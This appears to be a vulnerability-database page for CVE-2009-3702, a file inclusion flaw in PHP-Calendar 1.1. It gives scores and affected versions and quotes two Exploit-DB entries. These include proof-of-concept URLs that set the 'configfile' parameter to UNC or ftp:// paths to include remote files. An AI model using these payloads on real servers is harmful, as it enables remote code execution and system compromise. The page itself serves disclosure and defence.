CVE-2009-3702
published 2009-12-22CVE-2009-3702: Multiple absolute path traversal vulnerabilities in PHP-Calendar 1.1 allow remote attackers to include and execute arbitrary local files via a full pathname in…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.45%
82.3th percentile
Multiple absolute path traversal vulnerabilities in PHP-Calendar 1.1 allow remote attackers to include and execute arbitrary local files via a full pathname in the configfile parameter to (1) update08.php or (2) update10.php. NOTE: in some environments, this can be leveraged for remote file inclusion by using a UNC share pathname or an ftp, ftps, or ssh2.sftp URL.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-calendar | php-calendar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-Calendar 1.1 - 'update10.php?configfile' Traversal Local File Inclusion
exploitdb·2009-12-21
CVE-2009-3702 PHP-Calendar 1.1 - 'update10.php?configfile' Traversal Local File Inclusion
PHP-Calendar 1.1 - 'update10.php?configfile' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/37450/info
PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/p
Exploit-DB
PHP-Calendar 1.1 - 'update08.php?configfile' Traversal Local File Inclusion
exploitdb·2009-12-21
CVE-2009-3702 PHP-Calendar 1.1 - 'update08.php?configfile' Traversal Local File Inclusion
PHP-Calendar 1.1 - 'update08.php?configfile' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/37450/info
PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
http://www.example.com/php-calendar-1.1/update08.php?configfile=ftp:
No writeups or analysis indexed.
2009-12-22
Published